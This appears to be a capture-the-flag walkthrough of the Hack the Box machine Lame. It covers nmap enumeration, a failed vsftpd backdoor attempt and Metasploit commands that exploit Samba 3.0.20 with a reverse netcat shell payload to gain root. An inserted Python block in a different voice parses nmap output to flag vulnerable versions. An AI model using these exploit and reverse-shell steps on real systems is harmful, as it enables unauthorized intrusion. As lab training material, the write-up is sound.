As my last guide was unexpectedly popular (thanks mostly to a retweet by @hackthebox_eu), I figured I should get on and write another one; this time for the Hack the Box retired machine, Lame.

Note: You can find my guide to Shocker here and my guide to Beep here.


So we begin, as always, with our initial nmap scan.

$ nmap -sC -sV -p- -oA nmap/initial

First look shows that there is an FTP service running which allows anonymous login, so let's take a peek and see what we can find.


Which unfortunately appears to be nothing :(

However, the nmap scan revealed the version of FTP software running is vsftpd 2.3.4. A quick searchsploit shows that this version of the software has a backdoor command execution vulnerability. Let's see if we can take advantage of this.


Looking at further information about this exploit shows it is a Metasploit module, so let's fire up msfconsole and give it a whirl.


Lame indeed. It seems that while vsftpd 2.3.4 does have a backdoor command execution vulnerability, this particular installation must have been patched. So let's go back to our nmap scan and look for other attack vectors.

Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.


Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.

$ nmap --script smb-vuln* --script-args=unsafe=1 -p 445

Unfortunately this also fails to find anything. However, taking the Samba version number from our initial nmap scan (3.0.20), we can run searchsploit, which does present us with another likely candidate.
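The "take the version from the nmap scan and look it up" step is worth making repeatable, so here is an added example (my own code, not from the walkthrough or from nmap) that parses nmap's XML output (written by -oA alongside the .nmap and .gnmap files) and flags the two banners this guide singles out. The XML input and the issue table are constructed for the example; the product/version attributes are the ones nmap's XML actually emits.

```python
import xml.etree.ElementTree as ET

# Banners the walkthrough singled out and why they matter. Constructed for this
# example; in practice this table comes from your own advisory/patch tracking.
KNOWN_ISSUES = {
    ("vsftpd", "2.3.4"): "backdoor command execution (exploit did not fire on Lame)",
    ("Samba smbd", "3.0.20"): "command execution via usermap_script (gave a root shell)",
}

# Constructed nmap -oX output approximating the Lame scan; not real scan data.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><address addr="10.0.0.5" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="21"><state state="open"/>
   <service name="ftp" product="vsftpd" version="2.3.4"/></port>
  <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
  <port protocol="tcp" portid="445"><state state="open"/>
   <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
 </ports></host>
</nmaprun>"""

def parse_services(xml_text: str) -> list[dict]:
    """One record per open port; version is kept exactly as nmap printed it."""
    records = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            if state is None or state.get("state") != "open" or svc is None:
                continue
            records.append({"host": addr, "port": int(port.get("portid")),
                            "product": svc.get("product", ""),
                            "version": svc.get("version", "")})
    return records

def flag_known_issues(xml_text: str) -> list[dict]:
    """Return open services whose (product, base version) is in KNOWN_ISSUES.
    Distro suffixes such as '-Debian' are stripped so 3.0.20-Debian matches 3.0.20."""
    flagged = []
    for rec in parse_services(xml_text):
        base_version = rec["version"].split("-")[0]
        note = KNOWN_ISSUES.get((rec["product"], base_version))
        if note:
            flagged.append({**rec, "note": note})
    return flagged

if __name__ == "__main__":
    for f in flag_known_issues(SAMPLE_XML):
        print(f"{f['host']}:{f['port']} {f['product']} {f['version']} -> {f['note']}")
```

Run it against the real scan with `flag_known_issues(open("nmap/initial.xml").read())`; port 139 in the sample shows that a banner with no product/version simply passes through unflagged.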


The second entry is a remote heap overflow and so unlikely to help us here, but the first one looks more promising. It's another Metasploit module, so let's fire up msfconsole again and give it a go.


We run the following:

> use exploit/multi/samba/usermap_script
> set rhost
> set payload cmd/unix/reverse_netcat
> set lhost
> exploit

And straight away we get a root shell, along with access to both flags :)